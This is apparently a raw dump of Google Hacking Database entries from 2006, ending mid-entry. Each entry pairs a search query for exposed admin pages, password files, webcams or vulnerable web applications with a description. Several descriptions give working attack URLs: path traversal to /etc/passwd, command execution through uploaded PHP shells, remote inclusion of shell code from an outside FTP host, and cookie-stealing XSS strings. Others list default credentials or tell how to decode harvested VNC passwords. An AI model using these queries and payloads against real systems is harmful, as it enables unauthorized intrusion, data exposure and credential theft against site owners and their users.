{"short description": "inurl:build.err", "long description": "General build error file. Can tell what modules are installed, the OS the compiler the language, in theory usernames and passwords could probably be found too.", "submited": "2006-01-16", "request": "inurl:build.err", "id": 1251}, {"short description": "intext:ViewCVS inurl:Settings.php", "long description": "CVs is a software used to keep track of changes to websites. You can review all updates and previous files wihtout actualy loging into CVS. It is possible to see password files, directory structure, how often is the website updated, previous code find exploits, etc.", "submited": "2006-01-16", "request": "intext:ViewCVS inurl:Settings.php", "id": 1252}, {"short description": "\"Powered by Midmart Messageboard\" \"Administrator Login\"", "long description": "Midmart Messageboard lets you run a highly customizable bulletin board with a very nice user interface (similar to Yahoo Clubs) on your web site in few minutes. Many other features included. Rar found it murfie cleaned it up.", "submited": "2006-01-16", "request": "\"Powered by Midmart Messageboard\" \"Administrator Login\"", "id": 1253}, {"short description": "inurl:install.pl intitle:GTchat", "long description": "Gtchat install file.You can disable the chat program or change the language without a admin username or password. You can also point the chatroom information to a different URL in theory using a crosscript to take over the the chatroom.", "submited": "2006-01-16", "request": "inurl:install.pl intitle:GTchat", "id": 1254}, {"short description": "inurl:rpSys.html", "long description": "Web configuration pages for various types of systems. Many of these systems are not password protected.", "submited": "2006-01-22", "request": "inurl:rpSys.html", "id": 1255}, {"short description": "intitle:\"Horde :: My Portal\" -\"[Tickets\"", "long description": "Hi   It will give you administrative ownership over Horde webmail system plus all users in Horde webmail system.. also php shell :) and much more ...Edited by CP", "submited": "2006-02-03", "request": "intitle:\"Horde :: My Portal\" -\"[Tickets\"", "id": 1256}, {"short description": "filetype:reg reg +intext:", "long description": "This can be used to get encoded vnc passwords which can otherwise be obtained by a local registry and decoded by cain &amp; abel. The query find registry entries which can otherwise be found can locally in:\\HKEY_CURRENT_USER\\Software\\ORL\\WinVNC3\\Password or\\HKEY_USERS\\.DEFAULT\\Software\\ORL\\WinVNC3\\PasswordIf you are a cain and abel user you'll and have used this feature before you will know how useful this query is. Other than decoded passwords you can also find other useful information on the VNC server and its security. I have successfully gained access to many VNC servers.", "submited": "2006-02-05", "request": "filetype:reg reg +intext:", "id": 1257}, {"short description": "\"Please re-enter your password It must match exactly\"", "long description": "Invision Powerboard registration pages. Plain and simple.", "submited": "2006-02-08", "request": "\"Please re-enter your password It must match exactly\"", "id": 1258}, {"short description": "intext:\"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed.\" -edu", "long description": "The page to change admin passwords. Minor threat but the place to start an attack.", "submited": "2006-02-08", "request": "intext:\"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed.\" -edu", "id": 1259}, {"short description": "inurl:CrazyWWWBoard.cgi intext:\"detailed debugging information\"", "long description": "gives tons of private forum configuration information.examples: Global variables installed, what groups the default user, guest and admin belong to, file paths, OS and appache versions, encypted admin password.Also Crazyboard has known vulnerabilities.", "submited": "2006-02-08", "request": "inurl:CrazyWWWBoard.cgi intext:\"detailed debugging information\"", "id": 1260}, {"short description": "intext:\"Welcome to Taurus\" \"The Taurus Server Appliance\" intitle:\"The Taurus Server Appliance\"", "long description": "Celestix Networks, Inc., the premier supplier of network server appliance, announces the Taurus(TM) Server Appliance, the all-in-one networking solution for the small to midsize business. The Taurus(TM) Server Appliance offers no compromise on functionality and scalability, and provides optimum efficiency at a lower price than traditional servers.With a single purchase, up to 250 users have integrated file and peripheral sharing, high-speed Internet access, email, scheduled back-up, VPN and secure firewall, anti-virus engine, and Intranet. Standard with built-in networking software and optimized applications, the Taurus(TM) supplies up to 40-GB of Internal storage. Seperate Admin and root password. Root password must be changed from the command prompt which means most Sysadmins won't change it from Default. Manuel hosted by the device no password needed.", "submited": "2006-02-08", "request": "intext:\"Welcome to Taurus\" \"The Taurus Server Appliance\" intitle:\"The Taurus Server Appliance\"", "id": 1261}, {"short description": "inurl:wl.exe inurl:?SS1= intext:\"Operating system:\" -edu -gov -mil", "long description": "List server apparently keeps track of many clients, not just Domains and hardware, but Operating systems as well. As always this information is able to be gained by Zero Packet methods.", "submited": "2006-02-08", "request": "inurl:wl.exe inurl:?SS1= intext:\"Operating system:\" -edu -gov -mil", "id": 1262}, {"short description": "inurl:setdo.cgi intext:\"Set DO OK\"", "long description": "Dcs-2100 camerasBy removing \"intext:Set DO OK\" you will get more hits but they will require a login. Set DO OK is almost always admin access, you will need to go to the root of the URL to use the camera.", "submited": "2006-02-08", "request": "inurl:setdo.cgi intext:\"Set DO OK\"", "id": 1263}, {"short description": "intitle:\"4images - Image Gallery Management System\" and intext:\"Powered by 4images 1.7.1\"", "long description": "Find web app: 4Images = 1.7.1This web app is vulenrable to remote code execution exploit.The url of exploit is this: http://milw0rm.com/id.php?id=1533Good hackingBy HaVoC", "submited": "2006-02-26", "request": "intitle:\"4images - Image Gallery Management System\" and intext:\"Powered by 4images 1.7.1\"", "id": 1264}, {"short description": "\"not for public release\" -.edu -.gov -.mil", "long description": "if you search through lots of these then you find some really juicy things, there files from police, airports, government companies all kind of stuff that is not meant to be seen by normal people.", "submited": "2006-02-22", "request": "\"not for public release\" -.edu -.gov -.mil", "id": 1265}, {"short description": "(intitle:\"metaframe XP Login\")|(intitle:\"metaframe Presentation server Login\")", "long description": "Once you input any username, you'll get an error message. Try putting a script with some other fun commands in it. Just send some info off to be logged.If exploited correctly, could give you admin access to a network.", "submited": "2006-02-12", "request": "(intitle:\"metaframe XP Login\")|(intitle:\"metaframe Presentation server Login\")", "id": 1266}, {"short description": "inurl:ids5web", "long description": "EasyAccess Web is a application to view radiological images online.Like in hospitals or universities.Problem is the default administrative login: wadm/wadmBe able to watch sensitive data and images.very bad...", "submited": "2006-02-09", "request": "inurl:ids5web", "id": 1267}, {"short description": "filetype:sql \"insert into\" (pass|passwd|password)", "long description": "Looks for SQL dumps containing cleartext or encrypted passwords.", "submited": "2006-03-06", "request": "filetype:sql \"insert into\" (pass|passwd|password)", "id": 1268}, {"short description": "\"Powered by Simplog\"", "long description": "searches for simplog which has directory traversal and XSS velnerabilites in version", "submited": "2006-03-06", "request": "\"Powered by Simplog\"", "id": 1269}, {"short description": "\"index of /\" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )", "long description": "searches for scripts that let you upload files which you can then execute on the server.", "submited": "2006-03-06", "request": "\"index of /\" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )", "id": 1270}, {"short description": "inurl:\"/admin/configuration. php?\" Mystore", "long description": "simply google inurl trick for Oscommerce for open administrator page.If no .htpassword is set for the admin folder of osCommerce then of course you can change any setting in the shop unless password security has been enabled on the admin console.Despite a few demo pages there are a few open admin pages for webshops.Simple patch if you are one is to place a .htpassword file in the root of the admin folder. -- J.R.Middleton", "submited": "2006-03-07", "request": "inurl:\"/admin/configuration. php?\" Mystore", "id": 1271}, {"short description": "\"powered by sblog\" +\"version 0.7\"", "long description": "please go here for a writeup on the vulnerability.HTML injection.http://www.securityfocus.com/bid/17044", "submited": "2006-03-13", "request": "\"powered by sblog\" +\"version 0.7\"", "id": 1272}, {"short description": "inurl:\"NmConsole/Login.asp\" | intitle:\"Login - Ipswitch WhatsUp Professional 2005\" | intext:\"Ipswitch WhatsUp Professional 2005 (SP1)\" \"Ipswitch, Inc\"", "long description": "Ipswitch Whats Up Monitoring 2005!This is a console for Network Monitoring, access beyond the portal will allow you to do various things, such as telnet to internal machines, reboot servers, gain server information such as IP address.If the Administrators have utilised WUG to its potential, they will have also made full Infrastructure MAPs available.  Access beyond the portal is Gold Information, you would have access to information and services as if you were an Administrator.In addition, some of the links, allow you to go beyond the portal as a guest user, this still allows reconisance of various servers and details of them, including where they are located physically.For anybody that is interested, the Login Portal has a SQL based Backend.", "submited": "2006-03-13", "request": "inurl:\"NmConsole/Login.asp\" | intitle:\"Login - Ipswitch WhatsUp Professional 2005\" | intext:\"Ipswitch WhatsUp Professional 2005 (SP1)\" \"Ipswitch, Inc\"", "id": 1273}, {"short description": "filetype:asp  + \"[ODBC SQL\"", "long description": "This search returns more than just the one I saw already here. This one will return all ODBC SQL error pages including all data returned in the error. The information can range from simple data such as the table/row queried to full Database name etc.An attacker could take this information and use it to gain a foot hold into the SQL server and could use the information for an SQL injection attack.", "submited": "2006-03-13", "request": "filetype:asp  + \"[ODBC SQL\"", "id": 1274}, {"short description": "(intitle:\"WordPress Setup Configuration File\")|(inurl:\"setup-config.php?step=\")", "long description": "Alter setup configuration files.add ?step=1", "submited": "2006-03-15", "request": "(intitle:\"WordPress Setup Configuration File\")|(inurl:\"setup-config.php?step=\")", "id": 1275}, {"short description": "intitle:\"Joomla - Web Installer\"", "long description": "Joomla! is a Content Management System (CMS) created by the same team that brought the Mambo CMS. This dork finds the Web Installer page. On newer versions, after you install, joomla asks to delete installation dir before to be functional.The Webinstaller gives an attacker information about the php configuration and rgod has even found a way to inject data into the configuration.php file, resulting in a DoS attack (see the forums for more info).The admin logon can be found searching: intitle:\"- Administration [Joomla]\" but there are no default passwords.", "submited": "2006-03-18", "request": "intitle:\"Joomla - Web Installer\"", "id": 1276}, {"short description": "intitle:\"Webview Logon Page\"", "long description": "This is the web interface for Alcatel's Omniswitch. Default login is: admin/switch.", "submited": "2006-03-18", "request": "http://www.google.com/search?q=intitle:%22Webview+Logon+Page%22&amp;filter=0", "id": 1277}, {"short description": "(intitle:\"PRTG Traffic Grapher\" inurl:\"allsensors\")|(intitle:\"PRTG Traffic Grapher - Monitoring Results\")", "long description": "PRTG Traffic Grapher is Windows software for monitoring and classifying bandwidth usage. It provides system administrators with live readings and long-term usage trends for their network devices. The most common usage is bandwidth usage monitoring, but you can also monitor many other aspects of your network like memory and CPU utilizations.", "submited": "2006-03-18", "request": "(intitle:\"PRTG Traffic Grapher\" inurl:\"allsensors\")|(intitle:\"PRTG Traffic Grapher - Monitoring Results\")", "id": 1278}, {"short description": "intitle:\"AR-*\" \"browser of frame dealing is necessary\"", "long description": "A few Sharp printers ..", "submited": "2006-03-18", "request": "intitle:\"AR-*\" \"browser of frame dealing is necessary\"", "id": 1279}, {"short description": "intitle:\"WxGoos-\" (\"Camera image\"|\"60 seconds\" )", "long description": "This is used in serverrooms and such where climate conditions are crucial to hardware health. If an attacker were to guess the password for the configuration page, then he can find POP3 passwords in plain text in the HTML source code.It runs on \"I.T. Watchdogs, Inc. Embedded Web Server\"", "submited": "2006-03-18", "request": "intitle:\"WxGoos-\" (\"Camera image\"|\"60 seconds\" )", "id": 1280}, {"short description": "intext:\"you to handle frequent configuration jobs easily and quickly\" | intitle:\"Show/Search other devices\"", "long description": "ELSA DSL lan modems.", "submited": "2006-03-18", "request": "intext:\"you to handle frequent configuration jobs easily and quickly\" | intitle:\"Show/Search other devices\"", "id": 1281}, {"short description": "intitle:\"NAS\" inurl:indexeng.html", "long description": "Disk Online Server NAS device.", "submited": "2006-03-18", "request": "intitle:\"NAS\" inurl:indexeng.html", "id": 1282}, {"short description": "\"Thank You for using WPCeasy\"", "long description": "There is a SQL injection vulnerability in WPC.easy, resulting in full admin access to any remote attacker. Vendor was notified. http://www.securityfocus.com/archive/1/425395", "submited": "2006-03-18", "request": "\"Thank You for using WPCeasy\"", "id": 1283}, {"short description": "intitle:\"Skystream Networks Edge Media Router\" -securitytracker.com", "long description": "skystream Networks Edge Media Router.", "submited": "2006-03-18", "request": "intitle:\"Skystream Networks Edge Media Router\" -securitytracker.com", "id": 1284}, {"short description": "intitle:\"Ethernet Network Attached Storage  Utility\"", "long description": "Linksys network storage utility.", "submited": "2006-03-18", "request": "intitle:\"Ethernet Network Attached Storage  Utility\"", "id": 1285}, {"short description": "intitle:\"GigaDrive Utility\"", "long description": "Linksys GigaDrive network storage utility.", "submited": "2006-03-18", "request": "intitle:\"GigaDrive Utility\"", "id": 1286}, {"short description": "intitle:\"LOGREP - Log file reporting system\" -site:itefix.no", "long description": "Logrep is an open source log file Extraction and Reporting System by ITeF!x.  This dork finds the logs that it creates.", "submited": "2006-03-21", "request": "intitle:\"LOGREP - Log file reporting system\" -site:itefix.no", "id": 1287}, {"short description": "inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com", "long description": "RemotelyAnywhere is a program that enables remote control, in the same matter as VNC.  Once Logged in an attacker has almost complete control of the computer.", "submited": "2006-03-21", "request": "inurl:2000 intitle:RemotelyAnywhere -site:realvnc.comg", "id": 1288}, {"short description": "\"Web-Based Management\" \"Please input password to login\" -inurl:johnny.ihackstuff.com", "long description": "This dork finds firewall/vpn products from fiber logic.  They only require a one-factor authentication.", "submited": "2006-03-21", "request": "\"Web-Based Management\" \"Please input password to login\" -inurl:johnny.ihackstuff.com", "id": 1289}, {"short description": "intitle:\"DVR Client\" -the -free -pdf -downloads -blog -download -dvrtop", "long description": "This dork finds digital video recording client from Nuvico.", "submited": "2006-03-21", "request": "intitle:\"DVR Client\" -the -free -pdf -downloads -blog -download -dvrtop", "id": 1290}, {"short description": "\"OK logout\" inurl:vb.htm?logout=1", "long description": "This is a google dork for Hunt Electronics web cams.  To get to the cameras remove the vb.htm?logout=1 from the url.", "submited": "2006-03-21", "request": "\"OK logout\" inurl:vb.htm?logout=1", "id": 1291}, {"short description": "intitle:\"Edr1680 remote viewer\"", "long description": "This search finds the  1680 series digital video recorder from EverFocus.", "submited": "2006-03-21", "request": "intitle:\"Edr1680 remote viewer\"", "id": 1292}, {"short description": "inurl:\"vsadmin/login\" | inurl:\"vsadmin/admin\" inurl:.php|.asp  -\"Response.Buffer = True\" -javascript", "long description": "Ecommerce templates makes a online shopping cart solution. This search finds the admin login.", "submited": "2006-03-21", "request": "inurl:\"vsadmin/login\" | inurl:\"vsadmin/admin\" inurl:.php|.asp  -\"Response.Buffer = True\" -javascript", "id": 1293}, {"short description": "intitle:\"Login to @Mail\" (ext:pl | inurl:\"index\") -dwaffleman", "long description": "Webmail is a http based email server made by atmail.com. To get to the admin login instead of regular login add webadmin/ to the url.", "submited": "2006-03-21", "request": "intitle:\"Login to @Mail\" (ext:pl | inurl:\"index\") -dwaffleman", "id": 1294}, {"short description": "inurl:\"calendarscript/users.txt\"", "long description": "CalenderScript is an overpriced online calender system written in perl. The passwords are encrypted using perl's crypt() function which I think DES encrypts things. However if the computer the calender script is on doesn't support the crypt function the are plaintext. Changing calender dates might not sound useful but people reuse passwords so who knows? Also search for the logins:intitle:\"Calendar Administration : Login\" | inurl:\"calendar/admin/index.asp\" -demo -demos Then to get the passwords change the url fromwxw.calendersiteexample.com/thissite/calendar_admin.cgitowxw.calendersiteexample.com/thissite/calendarscript/users.txt The defaults are anonymous/anonymous and Administrator/Administrator.", "submited": "2006-03-21", "request": "inurl:\"calendarscript/users.txt\"", "id": 1295}, {"short description": "intitle:\"EZPartner\" -netpond", "long description": "EZPartner is a great marketing tool that will help you increase your sales by sending webmaster affiliate traffic to your sites.  This search finds the logins.", "submited": "2006-03-21", "request": "intitle:\"EZPartner\" -netpond", "id": 1296}, {"short description": "\"Powered by Loudblog\"", "long description": "this dork is for the LoudBlog", "submited": "2006-02-08", "request": "\"Powered by Loudblog\"", "id": 1297}, {"short description": "\"This website engine code is copyright\" \"2005 by Clever Copy\" -inurl:demo", "long description": "Clever Copy", "submited": "2006-02-08", "request": "\"This website engine code is copyright\" \"2005 by Clever Copy\" -inurl:demo", "id": 1298}, {"short description": "intitle:\"b2evo installer\" intext:\"Installer Version\"", "long description": "this page lets you to know some interesting info on target machine, database name, username... it lets you to see phpinfo() and, if you know database password, lets you to inject arbitrary code in blogs/conf/_config.php, regardless of magic_quotes_gpc settings and launch commands wrote a simple dictionary attack tool fot this: http://retrogod.altervista.org/b2evo_16alpha_bf.html", "submited": "2006-02-08", "request": "intitle:\"b2evo installer\" intext:\"Installer Version\"", "id": 1299}, {"short description": "\"index of\" intext:fckeditor inurl:fckeditor", "long description": "\"index of\" intext:fckeditor inurl:fckeditor this dork is for FCKEditor scriptthrough editor/filemanager/browser/default/connectors/connector.php script a user can upload malicious contempt on target machine including php code and launch commands... however if you do not succeed to execute the shell, FCKEditor is integrated in a lot of applications, you can check for a local inclusion issue inside of them... this tool make the dirty work for 2.0 - 2.2 versions: http://retrogod.altervista.org/fckeditor_22_xpl.html", "submited": "2006-02-09", "request": "\"index of\" intext:fckeditor inurl:fckeditor", "id": 1300}, {"short description": "\"powered by runcms\" -runcms.com -runcms.org", "long description": "\"powered by runcms\" -runcms.com -runcms.org all versions", "submited": "2006-02-09", "request": "\"powered by runcms\" -runcms.com -runcms.org", "id": 1301}, {"short description": "(\"This Dragonfly installation was\" | \"Thanks for downloading Dragonfly\") -inurl:demo -inurl:cpgnuke.com", "long description": "exploit and short explaination: http://retrogod.altervista.org/dragonfly9.0.6.1_incl_xpl.html", "submited": "2006-02-13", "request": "(\"This Dragonfly installation was\" | \"Thanks for downloading Dragonfly\") -inurl:demo -inurl:cpgnuke.com", "id": 1302}, {"short description": "inurl:docmgr | intitle:\"DocMGR\" \"enter your Username and\"|\"und Passwort bitte\"|\"saisir votre nom\"|\"su nombre de usuario\" -ext:pdf -inurl:\"download.php", "long description": "exploit and short explaination: http://retrogod.altervista.org/docmgr_0542_incl_xpl.html", "submited": "2006-02-13", "request": "inurl:docmgr | intitle:\"DocMGR\" \"enter your Username and\"|\"und Passwort bitte\"|\"saisir votre nom\"|\"su nombre de usuario\" -ext:pdf -inurl:\"download.php", "id": 1303}, {"short description": "(intitle:\"Flyspray setup\"|\"powered by flyspray 0.9.7\") -flyspray.rocks.cc", "long description": "exploiting a bug in EGS Enterprise Groupware System 1.0 rc4, I found this dork: (intitle:\"Flyspray setup\"|\"powered by flyspray 0.9.7\") -flyspray.rocks.cc It is related to the installation script of FileSpray 0.9.7, now I'm going to test 0.9.8-9 by now switch to sql/ directory and search the install-0.9.7.php script explaination link: http://retrogod.altervista.org/egs_10rc4_php5_incl_xpl.htmlexploit adjusted for flyspray: http://retrogod.altervista.org/flyspray_097_php5_incl_xpl.html", "submited": "2006-02-13", "request": "(intitle:\"Flyspray setup\"|\"powered by flyspray 0.9.7\") -flyspray.rocks.cc", "id": 1304}, {"short description": "intext:\"LinPHA Version\" intext:\"Have fun\"", "long description": "this is for Linpha", "submited": "2006-02-13", "request": "intext:\"LinPHA Version\" intext:\"Have fun\"", "id": 1305}, {"short description": "inurl:updown.php | intext:\"Powered by PHP Uploader Downloader\"", "long description": "this (evil ) script lets you to upload a php shell on target server, in most cases not password protected dork: inurl:updown.php | intext:\"Powered by PHP Uploader Downloader\" a note: sometimes you don't see a link to a list of uploaded files... just switch to http://[target]/[path]/updown.php?action=download", "submited": "2006-02-28", "request": "inurl:updown.php | intext:\"Powered by PHP Uploader Downloader\"", "id": 1306}, {"short description": "(\"powered by nocc\" intitle:\"NOCC Webmail\") -site:sourceforge.net -Zoekinalles.nl -analysis", "long description": "dork: (\"powered by nocc\" intitle:\"NOCC Webmail\") -site:sourceforge.net -Zoekinalles.nl -analysis software: http://nocc.sourceforge.net/ this is for Nocc Webmail multiple arbitrary local inclusion, multiple xss &amp; possible remote code execution flaws I found: example of arbitrary local inclusion: http://[target]/[path]/html/footer.php?cmd=dir&amp;_SESSION[nocc_theme]=../../../../../../../../../test.php%00 http://[target]/[path]/html/footer.php?_SESSION[nocc_theme]=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/index.php?lang=fr&amp;theme=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/index.php?lang=../../../../../../../../../../../../test example of commands execution (including an uploaded mail attachment with php code inside, filename is predictable...) http://[target]/[path]/index.php?cmd=dir&amp;lang=../tmp/php331.tmp1140514888.att%00 xss: http://[target]/[path]/html/error.php?html_error_occurred=alert(document.cookie) http://[target]/[path]/html/filter_prefs.php?html_filter_select=alert(document.cookie) http://[target]/[path]/html/no_mail.php?html_no_mail=alert(document.cookie) http://[target]/[path]/html/html_bottom_table.php?page_line=alert(document.cookie) http://[target]/[path]/html/html_bottom_table.php?prev=alert(document.cookie) http://[target]/[path]/html/html_bottom_table.php?next=alert(document.cookie) http://[target]/[path]/html/footer.php?_SESSION[nocc_theme]=\"&gt;alert(document.cookie) full advisory &amp; poc exploit: http://retrogod.altervista.org/noccw_10_incl_xpl.html", "submited": "2006-02-28", "request": "(\"powered by nocc\" intitle:\"NOCC Webmail\") -site:sourceforge.net -Zoekinalles.nl -analysis", "id": 1307}, {"short description": "intitle:\"igenus webmail login\"", "long description": "intitle:\"igenus webmail login\"example exploit: http://[target]/[path]/?Lang=../../../../../../../../../../etc/passwd%00 http://[target]/[path]/config/config_inc.php?SG_HOME=../../../../../../../../../../etc/passwd%00 also, on php5: http://[target]/[path]/config/config_inc.php?SG_HOME=ftp://username:password@somehost.com&amp;cmd=dir where on somehost.com you have a php shell code in a \".config\" file exploit code: http://retrogod.altervista.org/igenus_202_xpl_pl.html", "submited": "2006-02-28", "request": "intitle:\"igenus webmail login\"", "id": 1308}, {"short description": "allintitle:\"FirstClass Login\"", "long description": "allintitle:\"FirstClass Login\" this is for firstclass directory listingsgo to http://[target]/[path]/Search type just ' in search field and you have a list of downloadable files, you don't see all files on server but you can search for a robots.txt with some folders path or other info for site scructure, crawling in this way you have unauthorized access on all files on the target server", "submited": "2006-02-28", "request": "allintitle:\"FirstClass Login\"", "id": 1309}, {"short description": "\"powered by 4images\"", "long description": "this is for 4images", "submited": "2006-02-28", "request": "\"powered by 4images\"", "id": 1310}, {"short description": "intext:\"Powered By Geeklog\" -geeklog.net", "long description": "dork: intext:\"Powered By Geeklog\" -geeklog.net this is for the vulnerability discovered by GulfTech research, related stuff: (*) http://www.gulftech.org/?node=research&amp;article_id=00102-02192006 http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=geeklog&amp;type=archives&amp;%5Bsearch%5D.x=0&amp;%5Bsearch%5D.y=0 exploit for (*) : http://retrogod.altervista.org/geeklog_1_4_xpl_php_.html (php) http://retrogod.altervista.org/geeklog_1_4_xpl_perl_.html (perl...mphhh)", "submited": "2006-02-28", "request": "intext:\"Powered By Geeklog\" -geeklog.net", "id": 1311}, {"short description": "intitle:admbook intitle:version filetype:php", "long description": "intitle:admbook intitle:version filetype:php tested version: 1.2.2, you can inject php code in config-data.php and execute commands on target through X-FOWARDED FOR http header when you post a message also you can see phpinfo(): http://[target]/[path]/admin/info.phpperl exploit:http://retrogod.altervista.org/admbook_122_xpl.html", "submited": "2006-02-28", "request": "intitle:admbook intitle:version filetype:php", "id": 1312}, {"short description": "WEBalbum 2004-2006 duda -ihackstuff -exploit", "long description": "dork: WEBalbum 2004-2006 duda -ihackstuff -exploitsoftware site: http://www.web-album.org/ advisory/ poc exploit: http://retrogod.altervista.org/webalbum_202pl_local_xpl.html", "submited": "2006-03-28", "request": "WEBalbum 2004-2006 duda -ihackstuff -exploit", "id": 1313}, {"short description": "intext:\"Powered by Plogger!\" -plogger.org -ihackstuff -exploit", "long description": "explaination &amp; exploit: http://retrogod.altervista.org/plogger_b21_sql_xpl.html", "submited": "2006-03-28", "request": "intext:\"Powered by Plogger!\" -plogger.org -ihackstuff -exploit", "id": 1314}, {"short description": "intext:\"powered by gcards\" -ihackstuff -exploit", "long description": "this is for gcards", "submited": "2006-03-28", "request": "intext:\"powered by gcards\" -ihackstuff -exploit", "id": 1315}, {"short description": "\"powered by php icalendar\" -ihackstuff -exploit", "long description": "this is for php iCalendar", "submited": "2006-03-28", "request": "\"powered by php icalendar\" -ihackstuff -exploit", "id": 1316}, {"short description": "\"powered by guestbook script\" -ihackstuff -exploit", "long description": "poc exploit &amp; explaination: http://retrogod.altervista.org/gbs_17_xpl_pl.html", "submited": "2006-03-28", "request": "\"powered by guestbook script\" -ihackstuff -exploit", "id": 1317}, {"short description": "\"Powered by XHP CMS\" -ihackstuff -exploit -xhp.targetit.ro", "long description": "tested version: 0.5 without to have admin rights, you can go to: http://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/manager.php or http://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/standalonemanager.php to upload a shell with the usual code inside... after: http://[target]/[path]/filemanager/shell.php?cmd=ls%20-la tool: http://retrogod.altervista.org/XHP_CMS_05_xpl.html", "submited": "2006-03-28", "request": "\"Powered by XHP CMS\" -ihackstuff -exploit -xhp.targetit.ro", "id": 1318}, {"short description": "inurl:*.exe ext:exe inurl:/*cgi*/", "long description": "a cgi-bin executables xss/html injection miscellanea:some examples:inurl:keycgi.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/keycgi.exe?cmd=download&amp;product=\"&gt;[XSS HERE] inurl:wa.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/wa.exe?SUBED1=\"&gt;[XSS HERE] inurl:mqinterconnect.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/mqinterconnect.exe?poi1iconid=11111&amp;poi1streetaddress=\"&gt;[XSS HERE]&amp;poi1city=city&amp;poi1state=OK inurl:as_web.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/as_web.exe?[XSS HERE]+B+wishes inurl:webplus.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webplus.exe?script=\"&gt;[XSS HERE] inurl:odb-get.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/odb-get.exe?WIT_template=\"&gt;[XSS HERE]&amp;WIT_oid=what::what::1111&amp;m=1&amp;d= inurl:hcapstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/hcapstat.exe?CID=\"&gt;[XSS HERE]&amp;GID=&amp;START=110&amp;SBN=OFF&amp;ACTION=Submit inurl:webstat.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/webstat.exe?A=X&amp;RE=\"&gt;[XSS HERE] inurl:cows.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/cows/cows.exe?cgi_action=tblBody&amp;sort_by=\"&gt;[XSS HERE] inurl:findifile.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/findfile.exe?SEEKER=\"&gt;[XSS HERE]&amp;LIMIT=50&amp;YEAR=\"&gt; inurl:baserun.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/baserun.exe?_cfg=\"&gt;[XSS HERE] inurl:Users.exe ext:exe inurl:/*cgi*/ html injection: http://[target]/[path]/cgi-bin/Users.exe?SITEID=[html]", "submited": "2006-03-28", "request": "inurl:*.exe ext:exe inurl:/*cgi*/", "id": 1319}, {"short description": "\"powered by claroline\" -demo", "long description": "this is for Claroline e-learning platform", "submited": "2006-03-30", "request": "\"powered by claroline\" -demo", "id": 1320}, {"short description": "\"PhpCollab . Log In\" | \"NetOffice . Log In\" | (intitle:\"index.of.\" intitle:phpcollab|netoffice inurl:phpcollab|netoffice -gentoo)", "long description": "this is for PhpCollab 2.x / NetOffice 2.x sql injectionhttp://retrogod.altervista.org/phpcollab_2x-netoffice_2x_sql_xpl.html", "submited": "2006-03-30", "request": "\"PhpCollab . Log In\" | \"NetOffice . Log In\" | (intitle:\"index.of.\" intitle:phpcollab|netoffice inurl:phpcollab|netoffice -gentoo)", "id": 1321}, {"short description": "inurl:/counter/index.php intitle:\"+PHPCounter 7.*\"", "long description": "This is an online vulnerable web stat program called PHPCounter 7.http://www.clydebelt.org.uk/counter/help.html It has several public vulnerabilities in versions 7.1 and 7.2 that include cross site scripting and unauthorized information disclosure.", "submited": "2006-04-06", "request": "inurl:/counter/index.php intitle:\"+PHPCounter 7.*\"", "id": 1322}, {"short description": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "long description": "this is the dork for PHPMyChat", "submited": "2006-04-05", "request": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "id": 1323}, {"short description": "\"2004-2005 ReloadCMS Team.\"", "long description": "this is for ReloadCMS", "submited": "2006-04-05", "request": "\"2004-2005 ReloadCMS Team.\"", "id": 1324}, {"short description": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "long description": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge this is for PHPMyChat remote commands execution,advisory/poc exploits:http://retrogod.altervista.org/phpmychat_0145_xpl.htmlhttp://retrogod.altervista.org/phpmychat_015dev_xpl.html", "submited": "2006-04-10", "request": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "id": 1325}, {"short description": "inurl:server.php ext:php intext:\"No SQL\" -Released", "long description": "vulnerabilitydiscovered by Secunia, quick reference:http://www.securityfocus.com/bid/16187an example of exploit for PHPOpenChat:http://retrogod.altervista.org/phpopenchat_30x_sql_xpl.htmla DOS exploit:http://retrogod.altervista.org/adodb_dos.html", "submited": "2006-04-10", "request": "inurl:server.php ext:php intext:\"No SQL\" -Released", "id": 1326}, {"short description": "intitle:PHPOpenChat inurl:\"index.php?language=\"", "long description": "exploit:http://retrogod.altervista.org/phpopenchat_30x_sql_xpl.htmlalso, information disclosure:http://[target]/[path]/include/adodb/tests/tmssql.php?do=phpinfoand denial of service on some windows system, multiple requests of:http://[target]/[path]/include/adodb/tests/tmssql.php?do=closelog", "submited": "2006-04-10", "request": "intitle:PHPOpenChat inurl:\"index.php?language=\"", "id": 1327}, {"short description": "\"powered by phplist\" | inurl:\"lists/?p=subscribe\" | inurl:\"lists/index.php?p=subscribe\" -ubbi -bugs +phplist -tincan.co.uk", "long description": "this is for PHPList 2.10.2 arbitrary local inclusion, discovered by me:advisory/poc exploit: http://retrogod.altervista.org/phplist_2102_incl_xpl.html", "submited": "2006-04-10", "request": "\"powered by phplist\" | inurl:\"lists/?p=subscribe\" | inurl:\"lists/index.php?p=subscribe\" -ubbi -bugs +phplist -tincan.co.uk", "id": 1328}, {"short description": "inurl:\"extras/update.php\" intext:mysql.php -display", "long description": "this is an osCommerce dork:inurl:\"extras/update.php\" intext:mysql.php -display or more simply: 